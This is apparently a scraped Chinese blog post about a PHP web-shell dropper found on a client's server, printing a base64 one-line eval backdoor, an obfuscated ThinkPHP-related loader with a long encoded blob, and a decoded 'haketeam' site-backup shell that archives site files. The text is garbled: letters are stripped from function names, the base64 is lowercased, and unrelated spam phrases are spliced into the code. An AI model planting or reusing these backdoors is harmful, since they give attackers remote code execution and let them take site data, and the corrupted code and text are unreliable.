PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64

更新时间:2023-04-06 12:52:39 阅读：评论：0

今天一个客户的服务器频繁被写入：

mm.php

内容为：

复制代码代码如下:

<?eval($_post[c]);?>

最后查到某文件内的第一行为以下代码：

复制代码代码如下:

fputs(fopen(ba64_decode(“bw0ucghw”),”w”),ba64_decode(“pd9ldmfskcrfue9tvftjxsk7pz4=”));

ba64_decode(“bw0ucghw”) //mm.php

ba64_decode(“pd9ldmfskcrfue9tvftjxsk7pz4=”) //

<?eval($_post[c]);?>

这样，只要这些文件被访问就会自动创建 mm.php

如果你发现了mm.php，删除了，以后还会再有的，真是越来越变态了~

下以相关内容

复制代码代码如下:

pd9ldmfs //ba64_encode(“<?eval”);

zxzhba== //ba64_encode(“eval”);

还发现一个thinkphp框架—sgcms的相密文件，内容以下：

复制代码代码如下:

<?php // code by isosky www.nbst.org

$ooo0o0o00=__file__;$ooo000000=urldecode(‘%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72′);$oo00o0000=12308;$ooo0000o0=$ooo000000{4}.$ooo000000{9}.$ooo000000{3}.$ooo000000{5};$ooo0000o0.=$ooo000000{2}.$ooo000000{10}.$ooo000000{13}.$ooo000000{16};$ooo0000o0.=$ooo0000o0{3}.$ooo000000{11}.$ooo000000{12}.$ooo0000o0{7}.$ooo000000{5};$o0o0000o0=’ooo0000o0’;eval(($$o0o0000o0(‘je9pme9pmdawmd0kt09pmdawmdaweze3fs4kt09pmdawmdawezeyfs4kt09pmdawmdaweze4fs4kt09pmdawmdawezv9lirpt08wmdawmdb7mtl9o2lmkcewksrpmdawtzbpmda9je9pme9pmdawmcgkt09pme8wtzawlcdyyicpoyrptzbptzawme89je9ptzawmdawmhsxn30uje9ptzawmdawmhsymh0uje9ptzawmdawmhs1fs4kt09pmdawmdawezl9lirpt08wmdawmdb7mtz9oyrptzbptzawtza9je9ptzawmdawmhsxnh0uje9ptzawmdawmhswfs4kt09pmdawmdaweziwfs4kt09pmdawmdawezb9lirpt08wmdawmdb7mjb9oyrptzbptzawme8oje8wmdbpme8wmcwxmty1ktskt08wme8wme8wpsgkt09pmdawme8wkcrptzbptzawtzaoje9pme9pmdawtygktzawme8wtzawldm4mcksj05twgzzt0cvuxexewf1ak00vzlfedh0bek3b0fivmr3nwheq3oyqjbuc3zqcfpts2diujnkvuxlaytynmnuauy9jywnqujdrevgr0hjsktmtu5puffsu1rvvldywvphymnkzwznaglqa2xtbm9wcxjzdhv2d3h5ejaxmjm0nty3odkrlycpksk7zxzhbcgkt08wme8wme8wkts=’)));return;?>

qytmafsmafsmafu3v/qwhb8gagoc7950lutg9xboluc0yxq0qdkzejtmaycge3ngydq0qdgnqytme3ngafsmax5zejcgejcgaycg1xwme3sme3ngaycnqycgafsmaycgaxgzejcgaycgafng19g0e2ui722mwrtwheo+il8veewljx8kj/wp9evk4xht7/huoywfdcqxag+3v2sgtbuy7lq9ajs8eg8p1eqliuwswcj0yxvs4zuywx7/9y219jbuezt4x8qe8o8t8uh7tbodilw27bvnotspagumaesbh0ujvl7ed/2rafyra34uuchkj9pkqrzs19z67bupaeu21xwmafnge3smafnsjl8litgnqytmafsmafsmaxz67tunarn0mghjatgif4ncog8h7fk5f4ncat8ji9snv/wgyt8bvt2lm9qfal+j7t+jy8w+hgxdqguka0w2a04tq0w2d/4ko/wzafp5ilhhh0u2vfu0icq3aeqdmdn5f4ncvg2jagxi9gop78w2itj58l8dhl2j79sxitupvln58cymaxsx7lwhqxj5q3z2ilhkqgv2vg8mvd509owxxotqeuuxqrz6jl8cogc5q3gkvg2jagxif4nchew+agx5v/2g7ejdvg8kvxtcheadm5j1ibtzd9bzolip7ggp7/4p7g4pvtgpalgpagzpofypofqpofapof4pofxpofiph/q2yguk7gxp7btra9bbot8p7/u2vxbp7tv2ab4pot+gvl4pvg8kvgor7typhxbdagtcoeouaew2y/wny/wzdgj1ator7l2mjcn6hgoz7g2m73ngjgj1w4j1f4sdalw+q/puxbqhilz0hbtuab4rqj8xwxqowfpuxbukagtrjda3a3a6f4sbal+jyt7hat2pdend4lqsitgdyyusieqkhltbvxs7ixh2o9bt7lqzit+hyyh2a/72vg2ci9bshb2haxbeit+3y8u2hb2bjgj17btmvxu3ols2jcyjh/56f4stf4nmvg8kvg7s7tbzy/w2d/whhb8hq/puxbqkhbw2hcnbh/55hltpot457eq27tk6f4sbal+jylusdbxraewgdfpux0sh7gwsabhra0skjgj1w4j1f4nmvg8kvg7s7tbzjb7kie83y/w2d/whhb8hjb7kie83q/puxbqkhbw2hducalbkhcncwcof4evojgj1w4j1ybquv/wkads6f4sbal+jylusdbxraewgdfpux0w2d/4z7g8caeqhvg2kacsmal+2jgj1ator7l2mylwkhfnuh/56f4sditup7eqkvt+zjduguxiuwcx6f4sdaeqz7lqralskq/ukag2zqgvr7t8mjgj1iltpaeqrq3ngafpux0sh7gwsabhra0skqf8gdfpux0jux5j1ybquv/wkacsnae72hds6f4sj7lhjytw2iltrilwsalkrabtm7epuxbqhilz0hbtuab4rqj8owepuxbqkhbw2hcnbh/55hltpot45qjib4jyewepuxbukagtrjdagafn6f4stf4nux0sr79s6f4sdaeqz7lqralskqxucila5hltpot46f4spot+2yth2otvnvfnbj/skjgj1ae72hb7paehril8ja3pux0vkhb4zveqhhfsdhb8horueaeqzjgj1atokyth2otvnvfnracsgdfpuxbuhhbvsacnjh/56f4sgitwzot+0jcwgdxnkh/56f4stf4nuxcgkhew+agxif4ncylh2it4iqnj1mg7khbj5itujottmm9qdqgu2vghk7fjdhgt3vxq5aboz7ejdhgt3vg7khbjdm5j1qxn5qnj1qxnc7g2lqgopotvmm9qp7t7jqdscago3h3jdhl8hhbunibtkqckuxdn5qxn0jgj1ot+sleu2vx50at8zaeq+llbsat2jqrg0acnjjyj01epuxb8cogc5qcbghbxiqxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxnzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzf4nqqxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5t3bbal+jqgukagtrm9agayqxafni1cgk7btmvf+v9gop78w2itj5xyh4qov2i0usvgx54bocoe8gqoun7tbpqoibycn54b8ji4j1x4zqqxn5qxn5qxn5qxn5qopc7btmvxscalbkhcjcafsx4cngmdncyl7ka04ilx7kh08zjbhjv/nryrtevehmogop79+cigj1x4zqqxn5qxn5qxn5qxn5qopc7btmvxscalbkhcjcafsx4cngmdncyl7ka04ilt23aeupd9v3qyqpalhrveveyb+dhe4maeq0f4n5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxn5qxjzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jzy9jqx4zqqxn5qxn5qxn5qxn5qxn5qxn5qxn5qxnuxz7sagx5eg23vfncyesr7ekdjgj1qg7zolq5m9skhg8m7g2r1xhmyrhsjgj1vlhsagxnqg7sagxthb8h7gwshd5z7bwshdzsf4s6f4ss7d5z7b2p7ejtqrk0w/gz7b2p7ejtqrkmqrz5f4scal+jot+u7epuxb8cogc5qcbsa0suvxsmitu2m9vz7b2p78zvqrsjdls2m9vcog8colqkdxh5vbopvtxtqrwbotb2qrndyd5z7b2p7ejtibo37t+hatxnlutg9xbolucsmrh0jdvcog8col8zqrzmq3k5q3puxb2b1g23ll7sagxnqg7sagxs14j1dgj17tunarndmg7ka0457boc7euhq0vsabvzot+0hugdq/usdbxtlxqulxqiacgk7btmvfkbabq3hfpbabq3hfpz7b2p7ebdhckdjgj1w4j17tb374j1dgj17tunarndmg7ka0457boc7euhq0vsabvzot+0hugdq/usdbxtlxqulxqiafgk7btmvfkbabq3hfpz7b2p7ebdhckdjgj1w4j1w4j1jl8cogc5qrn5f4n5qxn5f4n5qxn5wb2p78w+hgxrf4n5qxn5mg2mh/8jqg+hatxtqb7sag8jdls2qdsjdls2m9qj7lhjqdss7fjd7b2p7lw+hgxdqgupilu3m9qj7lhj7b22ag4dq/7ha/82m9qdq/usdbxtqcxgqckuxdn5qxnn4bbhabp57btrqgopaxbuhlx5q0gdq/wkq/u2hgorilw2ygxm7rkrhghgwghjatbco0s019nci0q5y3kuxdn5qxsxitupvln5wg2r7tujaeq+jdn5f4n5qxn5mg2mh/8jqg+hatxtq0wk7g2rqdsjdls2m9qj7lhjqdss7fjdvgtzolqdqgupilu3m9qj7lhj7b22ag4dq/7ha/82m9qshltwibocoe8gqds3ols2m9qja9qiqxnuxdn5qxnn4bbhabp57btrq/wnola57g2r7tujaeq+y/8379sr7tbhvg2l79suhbgpit+zq/2kv9szvlujqgq2qgodagx5vgc5veqsvgx57b2p79z5qnj1qxn5qfbdhck5qnj1qxn5qyqhilzuhxsjitu2jdn5f4n5qxn5mg2mh/8jqg+hatxtq0sshg+hatxdq/w+hgxtq0w2d/4dqg2zm9qrolsmitu2qdscago3h3jdvg8kvg7s7tbzqdslitbu7ejdoluky0sshxq5hl2r7ejduf4dmdn5f4n5qxn51x+roln5v/2g79sbotb219n5f4n5qxn5mgqrmdn5f4n5qxn5mgqrm5j1qxn5qfbsa0suvxsmitu2m9qditupvlndq/w+hgxtqbhs7gw2adq5ot4tqbqhilzuhxq5vbopvtxtqbwkdb2gqck5qxn5f4n5qxn5mg2mh/8jq/w+hgxtq0uuibusvxq5aboz7ejdxe8dat2jqdscago3h3jdi08jvgtmqdslitbu7ejdag8jlxv3qgvkq9qiqnj1qxn5qxn5mgwsvdshag20acjdil8mvg8rqckuxdn5qxnci9snhb8bm9qnv/wgjdckabq3vx+khbhdmcbsath5heqcm9qnv/wgjdckabq3vx+khbhkagt0ar+gabhdqgqkhbw2hcjdaxqimxthmcgk7g2lm5j1qxn5qfbzoliif4n5qxn5qxn5qxh6f4s37lwwvg2z78tpotusvx5g1epuxbupilu3qosqx/sshnj1dgj1vborqxwbotb2llukvt+jqfj5axn6f4slilq5qgwhvgo3v/qwag8mqxn5m9ngjgj1vborqxwzolq3v/qwag8mqfj5afpux07hhdnz7b2p7twhvgy5m9n0q3pux07hhdnz7esbotb2aboz7epux07hhdnz70n6f4slilq5qgwsh0ujhcj0q3pux07hhdnz7b2p7t7sa/w2h0a5m9shh0qhd95sjgj1708miewsalk5xl8jwb2p7x7sa/w2hd5z7b2p7lw+hgxsf4s6f4nzvghshrji7b2p7t7sa/w2h0a5m9s2d/spalw21xvcqrgz7b2p7lw+hgxsjgj1w4j1708miewsalk5vt+sdfqyaeuxotu21xwuab2kvg2z79ntqfnsqnj1dgj1q/wsat8hh0qhd9ntqx5zvt+sd/wsatx5mej5axz5mlv2vgwhvgxn19nrqgv2vgwhvgxnq/8molhjotu21epuxb2bqx5zvg2z7torhbo+trv+7torquj5mfy+jfnsqnj1dgj1q/wsat8hh0qhd8p0dt8hhdvvqxn5qfj5aezkafpuxdwjotu2ilqril2aqlukadvvqxn5qxntqfy6f4nzvg2z7torhbo+trvz7go+quj5qxn5m9nbjgj1q/wsat8hh0qhd8p0ogtuh0a0l9n5qfj5afpuxdwjotu2ilqril2aqlusa08j7la0l9ntqfn6f4nzvg2z7torhbo+trv37tukabw3quj5m9ngjgj1w4j1hb8jvlqmqx5nq/wsat8hh0qhd8p0dt8hhdvvqxjbje5g19ncmfqu19sc1xwjotu2ilqril2aqlukadvvqfgcacysq/gnq/wsat8hh0qhd8p0atwhd9vvqfgcaeisq/gnq/wsat8hh0qhd8p0ogtuh0a0l9ncmfyb19sc1xwjotu2ilqril2aqlusa08j7la0l9ncmfxsq/gnq/wsat8hh0qhd8p0hl8cal+zhrvvqfkia9z6f4stf4sbvt+cvg2kads3vgorvg7sagxnq/shvg55m9n07gtzar+roln014j1dgj1q/wnolazmbvr7b2p7t+hatxtq/shvg56f4nzal2gilwn7g2rmtorhbo+1xz6f4szagj1dgj1qgu+hgojogwsh2zvqfj5q/shvg55m9szolqmitu21xwgilwn1epux0ueog2p795zhgojoxnhm9n0ydhsjgj14g8m7x5zal2gilwn7g2r1epuxbwkf4s6f4nzhgojoxntqyscvlqr7t+j1xwzdlshvghzolqsjgj14gup7g2r1xwgilwn1epux0ueog2p79hnh/q2vd5zal2gilwn7g2r19z6f4ss7d5zvghshrji70nt4g7khg8m1xwjog23ye+0db7sag8mitu2yxveqrzsf4s6f4sr7lwuhbk5v/qu7epux0jux0q2v/8radsbitb37epux0juxb7uabujottmqgoz7g7sagxnqgwhvgypqg+hatxsf4s6f4nzaboz79ntq/ujh2tr7lspitu21xvhlxhpqrc0yxwmitu21epuxb2b1/ujh0qco/qnqg+hatxpqrc01ejtqrc019nux0q2v/8radnzvghshrjiitwz7g2r1xwmitu21epuxb2b1xo2alsjd95zvghshrji7b2p7t7sa/w2h0as14j1dgj1oti51xosa2thh0qhd9h2ab4n7lhgagtz7950ydhpqg+hatxs19gzvghshrji7b2p7t7sa/w2h0as14j1dgj1hb8jvlqmjgj1w4j1w4j1qgwjotu2qfj57g8cog8k1xwjog23ye+uab2kazwkhuwsatxn19z6f4nzog8k7/wsatx5m9n0l/50ydwzvg2z78pll9nmqgwjotu2t3vvqxk0l/50ydwzvg2z78pjl9nmqgwjotu2t38vqxk0l/50ydwzvg2z78prl9nmqgwjotu2t3uvqxk0l/50ydwzvg2z78pgl9nmqgwjotu2t3ovjgj17l7hax50qgh2dgwjotu2qfj5qdhmqgh2dgwjotu2qxk0qcp01epuxdwuabuwag8mqfj5hewrag8m1xwzilwh1epuxdwchbaqqfj5ieqca3qnqgwhvgysjgj1q/szilwhqxn5m9s0dbukalsr7lu31xwzilwh1epuxdwcllb2adn5qfj5hewrag8m1xwr7goji9z6f4nzdbwhvgy5qxntq/uui0ujhdh3vtq3v/qnq/szilwhyfnphewrag8m1xwr7goji9z5ye4syfqsjgj1qgwhvgo3v/q5qfj5q2bkueshdfwdl/5gaubkaf4djgj1qgwhvgo3v/q5ycj5q2bkaewhdfngqcpuxdwzilwhhewrqxktqxqhdfngl/5gaxq6f4nz7gojilujhdnmm9ndl/5gjobkafndjgj1qgwhvgo3v/q5ycj5qgh2dgwjotu2jgj1qgwhvgo3v/q5ycj5hgocor508dhpqgurirz6f4nz7gojilujhdnmm9sgitup1xvtqrgziutp7tksjgj1qgwhvgo3v/q5ycj5hgocor508dhpq/8miutp7tksjgj1qgwhvgo3v/q5ycj5hgocor50vdhphewrag8m1xwmitu219z6f4nz7gojilujhdnmm9sgitup1xvlqrgg1epuxdwzilwhhewrqxktqxwmitu2jgj1qgwhvgo3v/q5ycj5q/szilwhjgj1qgwhvgo3v/q5ycj5hgocor508dhpqgurirz6f4nz7gojilujhdnmm9sgitup1xvtqrgziutp7tksjgj1qgwhvgo3v/q5ycj5hgocor508dhpq/8miutp7tksjgj170vrolw21xwjog23ye+bhxgz7gojilujhdz6f4nzal2w7gojilujh2tp7tk5m9s3v/qp7tknqgwhvgo3v/qsjgj1vt+37l4nqgwhvgo3v/qsjgj1qgwsh0ujhdn5m9ndl/5uaobkugqhdfnbl/5gadq6f4nz7g2rhewrqxktqxqhdfngl/5gaxq6f4nz7g2rhewrqxktqxqhdfyjl/5gaxq6f4nz7g2rhewrqxktqxqhdfngl/5gaxq6f4nz7g2rhewrqxktqxqhdfnkl/5gaxq6f4nz7g2rhewrqxktqxwn7lhzvg2z7epuxdwzolq3v/q5ycj5hgocor508dhpqgurirz6f4nz7g2rhewrqxktq/shilpnqui0yxwcllb2adz6f4nz7g2rhewrqxktq/shilpnqui0yxwuabuwag8m1epuxdwzolq3v/q5ycj5hgocor50vdhphewrag8m1xwmitu219nsjgj1qgwsh0ujhdnmm9sgitup1xvlqrggqxz6f4nz7g2rhewrqxktq/shilpnqei0yfn51epuxdwzolq3v/q5ycj5hgocor50vdhpaxnsjgj1qgwsh0ujhdnmm9sgitup1xvlqrggqxz6f4nz7g2rhewrqxktq/shilpnqui0yfarqxz6f4nz7g2rhewrqxktq/shilpnqui0yxwjog23ye+zilwhhewrllb2adnsjgj1qgwsh0ujhdnmm9nzaboz7epuxdwjog23ye+zolq3v/q5ycj5qgwsh0ujhcpuxdwjog23qxji7b2p78tcae8mvxnp13puxdwjog23qxji7g2rhewrllb2adnpm9s3v/qp7tknqgwsh0ujhdz6f4nzvghshrnzmbwhvgo3v/qwag8mqxptqxwzd8tzilwhhewrllb2acpux0juxb7uabujottmqgoz7gwshd5zaboz79zux0puxdwmitu2qfj5hewrleq2hgbhilxnq2bhqdg0yrhpqg+hatxsjgj1qgwhvgo3v/q5m9ndl/5uaobkugqhdfn3l/5guobkagohdfngl/5gaobkafshdfngl/5gaobkafshdfngl/5gaobkafndjgj1qgwhvgo3v/q5ycj5hgocor508dhpaxzmhgocor508dhpaxzmhgocor508dhpaxzmhg撅屁股挨打ocor50vdhphewrag8m1xwmitu219nsjgj1qgwhvgo3v/q5ycj5hgocor50vdhpaxnsydwmitu2y0shilpnqui0yfnsy0shilpnqui0yfnsy0shilpnqui0yfnsjgj170vrolw21xwjog23ye+bhxgz7gojilujhdz6f4nzal2w7gojilujh2tp7tk5m9s3v/qp7tknqgwhvgo3v/qsjgj1vt+37l4nqgwhvgo3v/qsjgj1qgwsh0ujhdntqxqhdfxgl/5ji2bkafohdfnrl/5gaobkafshdfshl/5gaobkafshdfngl/5gaobkafshdfngl/5gaobkafshdfngqcpuxdwzolq3v/q5ycj5hgocor508dhpaxzmhgocor508dhpaxzmhgocor508dhpaxzmhgocor50vdhphewrag8m1xwmitu219nsjgj1qgwsh0ujhdnmm9sgitup1xvlqrggqxzmhgocor50vdhpaxnsy0shilpnqei0yfn519+gitup1xvlqrggqxz6f4nz7g2rhewrqxktq/shilpnqui0yfylqxzmhgocor508dhpq/wnolazmbwhvgo3v/q王菲2016年演唱会直播wag8m19kzaboz7epuxdwjog23ye+zolq3v/q5ycj5qgwsh0ujhcpuxdwjog23qxji7b2p78tcae8mvxnp13puxdwjog23qxji7g2rhewrllb2adnpm9s3v/qp7tknqgwsh0ujhdz6f4nzvghshrnzmbwhvgo3v/qwag8mqxptqxwzd8tzilwhhewrllb2acpux0juxb7uabujottmqgur7toj7t7sagxn14j1dgj1qg8m7/ujhdntqxqhdfxgl/5ji2bkaf8hdfnll/5gaobkafshdfngl/5gaxqmf4sgitup1xvlqrgzvghshrnzmb7sag8wiltua04sqxkux0shilpnqei0yxwjog23qxji7b2p78tcae8mvxz5y5j1hgocor508dhpq/wnola5ye+zolq3v/qwag8m19nmf4sgitup1xvtqrgzvghshrnzmbwhvgo3v/qwag8m19nmf4ndl/5gaobkafndjgj170vrolw21xwjog23ye+bhxgzvghshrji7g2rhewrydw2abw3v/qsjgj17bupaeu21xwjog23ye+bhxz6f4stf4stf4ss7d5hv/qsa95zluqox88oxuwadb2gaboz78js19nuxdwwxz8w8x8e8ozrolsmitu2l9ntqxvzalwkdb2gy0sshxh6f4s2a/u2qnj1qot9w8o8w8uxtesshg+hat8vqfj5v/qsa95zluqox88oxuwadb2gaboz78jsjgj1otinqlujh0qco/qnhewrvgtpaev2hd5zluqox88oxuwadb2gaboz78jsyxhmqrztm9hmdb2gqrz5f4nzluqox88oxuwadb2gaboz78j5ycj5qr+roln0jgj1qot9w8o8w8uxtewk7g2rl9ntq/ujh2tr7lspitu21xvhlxhpqrc0y/wrotjnqot9w8o8w8uxtewk7g2rl9zsjgj1otinqlujh0qco/qnhewrvgtpaev2hd5zluqox88oxuwavgtzolqv19g0yrhsmej0yrhsqnj1qot9w8o8w8uxtewk7g2rl9nmm9n0yrh6f4ss7d5zluqox88oxuwavgtzolqvmej0yrhsqnj1qot9w8o8w8uxtewk7g2rl9ntqxhmyrh6f4sbvt+cvg2kadspoluj7b2p7lanqgwshcj0ydhsf4s6f4s0agtditg5qgwk7gtroln6f4nzhe8dll7sag8wa08zqfj5afpuxb2b1g23ll7sagxnqdwzolqd19zux0puxb2b1/q2itbgilwn1xwzalwkdb2gqxji7esbotb2aboz79zhmlq2itbgilwn1xqz7g2rqdzsf4s6f4nz7gtzaesshxnzmboz7g7sagxnotugagtz7950qrbbotb21xqz7g2rqdzsyxqz7g2rqdz6f4sr7lwuhbk5aepux0jux0q2v/8radngjgj1w4j1qghhabwp7eukhg8m7g2r1xqz7g2rqdz6f4og2p79nnqg7sagx5m9sr7toz7g2r1xwnit+zagxs19nux0puxb2b1xwbotb2mej0ydvcwxwbotb2mej0ydk014j1iltmvg2mvtx6f4ss7dhshutzolqnqdwzolqkqg7sagxd19zux0puxdw3vtqw7b2p78tmvtj513j5ag23vg7sag831xqz7g2ryrwbotb2qdz6f4stf4s2a/u2qnj1dgj1otinhb8ha/shvg5nqgwk7gtroln5ye+0db7sag8mitu219ythb8ha/shvg5nqdwzolqkqg7sagxd19zux0puxdwzalwkdb2gqxjiitwz7b2p79hsalspalw21xh0yg7sagxnqdwzolqkqg7sagxd19zpqdwzolqkqg7sagxd1epuxdw3vtqw7b2p78tmvtj51rp6f4stf4stf4stf4scagt37twshd5zogom7gb21epuxb2b1xyzhe8dll7sag8wa08z19nuxdwzalwkdb2gqxjiitwz7b2p7950qrgdqgwshdcd1epux0q2v/8radnzhe8dll7sag8wa08zjgj1w4j1708miewsalk5a08zllqsv/8mol4nqg+ua9zux0puxdwdolwuab2jmtorhbo+1xh54dhpqrsy4dhpqrsu4dhpqrs/4dhsjgj17btr1xwp7lztafpzol8+mgukvt+j1xwdolwuab2j1epzol8+1rpsf4s6f4ss7d5za08zmcugaehnadgbaxnzol8+19jb14j1dgj1qg+ua8tdolwuab2jleujhcjnil8sax5za08zyeskvr5ryfyg1dwp7lzs1cygaxzkaeng19kdqxwdolwuab2jtrwp7l2vqcpux0jux0jux0q2v/8radnza08zllqsv/8molwwhewrjgj1w4j1otinoluwilqrilznqot9w8o8w8uxtlwbotb2l9zsf4s6f4nz7gtzaesshxntqg+2vrs49osroln6f4ss7d5zluqox88oxuwaql7sag8jdls2quj5qej5e28aexzuxdwzalwkdb2gqxjixl8jwb2p7x7sa/w2hd5zluqox88oxuwaql7sag8jdls2qujsjgj1otinqgwk7gtroln5ye+3vgorvg7sagxnqdwwxz8w8x8e8ozjalwsh2jzluqox88oxuwadb2gaboz78jd19zux0puxb8cogc5quvkhbzsabhpxgb2ilu2q/vhol4mydkci0qimgqrmdh6f4nz7b2p7t+ua9ntqfn6f4sbaeq2itun1xwwxz8w8x8e8ozz7b2p78j5ila5qg7sagxsf4s6f4ss7dhshutbotb21xwbotb219zux0puxb2b1xo2alsjd95z7gtzaesshxnzmb7sag8botbj7lq319zuxb2bqx5hot+wilqrilzn7t+z1g8khgbk7gxnqrk0yxwbotb219zpqgwk7gtroln5ye+botb27b2pvg8rhrzsf4scal+jot+u7epuxb8cogc5qcbbal+jqg7hilxtlxqeot+07g2m7euhqds3ols2m8gdu8gdmcqcyl7ka04iqb+dhen6qb+dhen6qg7sagxci0qiqcpux0juxb8phlxux0puxb8cogc5qcbbal+jqg7hilxtlxqeot+07g2m7euhqds3ols2m8gdu8gdmcncyl7ka04iqb+dhen6qg7sagxci0qiqcpux0juxdwbotb2a08zqxptqgbshewbotb2hr5z7b2p79z6f4stf4nz7gtzaesshxnzmbur7toj7t7sagxn1epuxb8cogc5qcbdhc+3vtuc7lu3yy7khdnz7b2p7t+ua9sbotb2hr+8hbgrmgy5o/q27cj0qot9w8o8w8uxtewk7g2rl9wwxz8w8x8e8ozrolsmitu2l9h5ll7coeuhvb8zvlqpm9hzluqox88oxuwavgtzolqvqot9w8o8w8uxtesshg+hat8vq3kzluqox88oxuwavgtzolqvqot9w8o8w8uxtesshg+hat8vqx5dyb+ua8tdolwuab2j1g7sag83ols21xqzluqox88oxuwavgtzolqvqot9w8o8w8uxtesshg+hat8vqdzsydhsmxthmdh6f4stf4s2a/u2f4s6f4s2ilhkqxqzluqox88oxuwavgtzolqvqot9w8o8w8uxtesshg+hat8vqy8rhbtryo8mitqp79sjarhb2j79sbotb2ycbdhckdjgj1w4j1w4j1jl8cogc5qrn5f4ncyl7khbjiqxnuxcgkibtzdek5qnj1mxtnvgupmdn5f4n0jg==

解密后为：

复制代码代码如下:

<?php

echo ‘<html>

<head>

<meta http-equiv=”content-type” content=”text/html; chart=gb2312″>

<title>haketeam website backup v1.0 beta – ‘;echo getenv(‘http_host’);;echo ‘</title>

<style type=”text/css”>

body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldt,legend,input,textarea,p,blockquote,th,td{

margin:0;padding:0;

}

body {

background:#ebebed;

color:#333;

font-family:”arial”,microsoft yahei,verdana,helvetica,arial,sans-rif;

font-size:14px;

}

.textfield,textarea {

border:1px solid green;

font-size:14px;

padding:2px;

}

.textfield:focus,textarea:focus {

border-color:#f1ca7e;

}

.button {

font-size:14px;

text-decoration:none;

margin-top:5px;

background:#f5f5f5;

border:1px solid green;

color:#000;

padding:2px 5px;

}

.button:hover {

text-decoration:none;

background:#eee;

border:1px solid #f1ca7e;

color:#000;

}

pre {

border:1px #ccc solid;

line-height:18px;

overflow:auto;

word-wrap:break-word;

max-height:220px;

margin:4px;

padding:4px 8px;

}

</style>

</head>

<form action=”” method=”post” name=”postform”>

<div align=”left” class=”archbox”>

‘;

ini_t(‘memory_limit’,’2048m’);

echo “<pre> ———————————————-

[<font color=#00bb00>*</font>]haketeam php website backup shell v1.0 beta

[<font color=#00bb00>*</font>]forum:http://www.hake.cc

[<font color=#00bb00>*</font>]isosky’s blog:www.nbst.org

———————————————-

file list:</pre>”;

$fdir = opendir(‘./’);

while($file=readdir($fdir))

{

if($file==’.’||$file==’..’)

continue;

echo “<input name=’dfile[]’ type=’checkbox’ value=’$file’ “.($file==baname(__file__)?”:’checked’).’> ‘;

if(is_file($file))

{

echo “<font face=\”wingdings\” size=\”5\”>2</font>$file<br>”;

}

el

{

echo “<font face=\”wingdings\” size=\”5\”>0</font>$file<br>”;

}

}

;echo ‘

filetype:

<input name=”filetype” type=”text” id=”filetype” class=”textfield” value=”” size=”50″>

(blank for all,u “|” to parate,e.g.:php|html|jpg) <br />

backup directory:

<input name=”todir” type=”text” id=”todir” class=”textfield” value=”iso_backup” size=”41″>

(blank for this directory,u relative url,and you must be able to write file)

<br>

backup name:

<input name=”zipname” type=”text” id=”zipname” class=”textfield” value=”iso.zip” size=”44″>

(.zip type file)

<br>

<br>

<input name=”backup” type=”hidden” id=”backup” value=”dozip”>

<input type=”submit” name=”submit” class=”button” value=”let\’s go!”>

<div align=”center”>

<a href=”http://nbst.org”><img src=”/d/file/titlepic/logo.png& border=”0″></a></div>

<div>

‘;

t_time_limit(0);

class phpzip

{

var $file_count = 0 ;

var $datastr_len = 0;

var $dirstr_len = 0;

var $filedata = ”;

var $gzfilename;

粤语老歌精选var $fp;

var $dirstr=”;

var $filefilters = array();

function tfilefilter($filetype)

{

$this->filefilters = explode(‘|’,$filetype);

}

function unix2dostime($unixtime = 0)

{

$timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);

if ($timearray[‘year’] <1980)

{

$timearray[‘year’] = 1980;

$timearray[‘mon’] = 1;

$timearray[‘mday’] = 1;

$timearray[‘hours’] = 0;

$timearray[‘minutes’] = 0;

$timearray[‘conds’] = 0;

}

return (($timearray[‘year’] -1980) <<25) |($timearray[‘mon’] <<21) |($timearray[‘mday’] <<16) |($timearray[‘hours’] <<11) |($timearray[‘minutes’] <<5) |($timearray[‘conds’] >>1);

}

function startfile($path = ‘dodo.zip’)

{

$this->gzfilename=$path;

$mypathdir=array();

do

{

$mypathdir[] = $path = dirname($path);

}while($path != ‘.’);

@end($mypathdir);

do

{

$path = @current($mypathdir);

@mkdir($path);

}while(@prev($mypathdir));

if($this->fp=@fopen($this->gzfilename,’w’))

{

return true;

}

return fal;

}

function addfile($data,$name)

{

$name = str_replace(‘\\’,’/’,$name);

if(strrchr($name,’/’)==’/’)

return $this->adddir($name);

if(!empty($this->filefilters))

{

if (!in_array(end(explode(‘.’,$name)),$this->filefilters))

{

return;

}

}

$dtime = dechex($this->unix2dostime());

$hexdtime = ‘\x’.$dtime[6] .$dtime[7] .’\x’.$dtime[4] .$dtime[5] .’\x’.$dtime[2] .$dtime[3] .’\x’.$dtime[0] .$dtime[1];

eval(‘$hexdtime = “‘.$hexdtime .'”;’);

$unc_len = strlen($data);

$crc = crc32($data);

$zdata = gzcompress($data);

$c_len = strlen($zdata);

$zdata = substr(substr($zdata,0,strlen($zdata) -4),2);

$datastr = “\x50\x4b\x03\x04”;

$datastr .= “\x14\x00”;

$datastr .= “\x00\x00”;

$datastr .= “\x08\x00”;

$datastr .= $hexdtime;

$datastr .= pack(‘v’,$crc);

$datastr .= pack(‘v’,$c_len);

$datastr .= pack(‘v’,$unc_len);

$datastr .= pack(‘v’,strlen($name));

$datastr .= pack(‘v’,0);

$datastr .= $name;

$datastr .= $zdata;

$datastr .= pack(‘v’,$crc);

$datastr .= pack(‘v’,$c_len);

$datastr .= pack(‘v’,$unc_len);

fwrite($this->fp,$datastr);

$my_datastr_len = strlen($datastr);

unt($datastr);

$dirstr = “\x50\x4b\x01\x02”;

$dirstr .= “\x00\x00”;

$dirstr .= “\x14\x00”;

$dirstr .= “\x00\x00”;

$dirstr .= “\x08\x00”;

$dirstr .= $hexdtime;

$dirstr .= pack(‘v’,$crc);

$dirstr .= pack(‘v’,$c_len);

$dirstr .= pack(‘v’,$unc_len);

$dirstr .= pack(‘v’,strlen($name) );

$dirstr .= pack(‘v’,0 );

$dirstr .= pack(‘v’,0 );

$dirstr .= pack(‘v’,0 );

$dirstr .= pack(‘v’,0 );

$dirstr .= pack(‘v’,32 );

$dirstr .= pack(‘v’,$this->datastr_len );

$dirstr .= $name;

